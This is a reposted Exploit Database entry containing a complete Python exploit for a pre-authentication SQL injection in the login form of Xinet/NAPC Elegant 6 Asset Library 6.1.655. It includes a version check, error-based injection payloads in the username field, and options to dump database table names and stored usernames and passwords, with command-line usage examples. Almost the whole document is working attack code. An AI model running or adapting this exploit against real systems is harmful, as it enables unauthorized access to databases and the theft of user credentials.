Xinet Elegant 6 Asset Lib Web UI 6.1.655 – SQL Injection

• Exploit Database
• 11 阅读

• 作者： hyp3rlinx
  日期： 2025-04-14
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/52192/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190

  # Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection # Exploit author: hyp3rlinx   import requests,time,re,sys,argparse   #NAPC Xinet Elegant 6 Asset Library v6.1.655 #Pre-Auth SQL Injection 0day Exploit #By hyp3rlinx #ApparitionSec #UPDATED: Jan 2024 for python3 #TODO: add SSL support #=============================== #This will dump tables, usernames and passwords in vulnerable versions #REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0 #SQL INJECTION VULN PARAM --> LoginForm[username] #================================================   IP="" PORT="80" URL="" NUM_INJECTS=20 k=1 j=0 TABLES=False CREDS=False SHOW_SQL_ERROR=False     def vuln_ver_chk(): global IP, PORT TARGET = "http://"+IP+":"+PORT+"/elegant6/login" response = requests.get(TARGET) if re.findall(r&apos;\bElegant",appVersion:"6.1.655\b&apos;, response.content.decode()): print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.") return True print("[!] Version not vulnerable :(") return False     def sql_inject_request(SQL):   global IP, PORT URL = "http://"+IP+":"+PORT+"/elegant6/login"   tmp="" headers = {&apos;User-Agent&apos;: &apos;Mozilla/5.0&apos;} payload = {&apos;LoginForm[password]&apos;:&apos;1&apos;,&apos;LoginForm[rememberMe]&apos;:&apos;0&apos;,&apos;LoginForm[username]&apos;:SQL} session = requests.Session()   res = session.post(URL,headers=headers,data=payload) idx = res.content.decode(&apos;utf-8&apos;).find(&apos;CDbCommand&apos;)# Start of SQL Injection Error in response idx2 = res.content.decode(&apos;utf-8&apos;).find(&apos;key 1&apos;)# End of SQL Injection Error in response   return res.content[idx : idx2+3]       #Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc def inc(): global k,j while j < NUM_INJECTS: j+=1 if k !=1: k+=1 return str(j)+&apos;,&apos;+str(k)     def tidy_up(results): global CREDS idx = results.find("&apos;".encode()) if idx != -1: idx2 = results.rfind("&apos;".encode()) if not CREDS: return results[idx + 1: idx2 -2] else: return results[idx + 2: idx2]       def breach(i): global k,j,NUM_INJECTS,SHOW_SQL_ERROR result=""   #Dump Usernames & Passwords if CREDS: if i % 2 == 0: target=&apos;username&apos; else: target=&apos;password&apos;   SQL=(&apos;"and (select 1 from(select count(*),concat((select(select concat(0x2b,&apos;+target+&apos;))&apos; &apos;from user limit &apos;+str(i)+&apos;, 1),floor(rand(0)*2))x from user group by x)a)-- -&apos;)   if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) if result: result = result.decode() else: result = sql_inject_request(SQL)+"\n" if result: result = result.decode() print("[+] Dumping "+str(target)+": "+str(result))   #Dump Tables if TABLES: while j < NUM_INJECTS: nums = inc() SQL=(&apos;"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()&apos; &apos;limit &apos;+nums+&apos;),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -&apos;)   if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL) + "\n" if result: print("[+] Dumping Table... " +str(result.decode())) time.sleep(0.3)       def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.") parser.add_argument("-p", "--port", help="Port, Default is 80") parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.") parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.") parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.") parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.") parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.") return parser.parse_args()       def usage(): print("Dump first ten rows of usernames and passwords") print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n") print("\nDump first five rows of database tables and show SQL errors") print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n") print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP>-p80 -t -c -m30\n") exit(0)     def main(args):   global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR   if args.ip_address: IP=args.ip_address   if args.port: PORT=args.port   if args.get_tables: TABLES=True   if args.creds: CREDS=True   if args.max_injects: NUM_INJECTS = int(args.max_injects)   if args.show_sql_errors: SHOW_SQL_ERROR=True   if args.examples: usage()   if vuln_ver_chk(): for i in range(0, NUM_INJECTS): breach(i) time.sleep(0.3)     if __name__==&apos;__main__&apos;:   parser = argparse.ArgumentParser()   print("NAPC Elegant 6 Asset Library v6.1.655") print("Pre-Authorization SQL Injection 0day Exploit") print("Discovery / eXploit By hyp3rlinx") print("ApparitionSec\n")   time.sleep(0.5)   if len(sys.argv)== 1: parser.print_help(sys.stderr) sys.exit(0)   main(parse_args())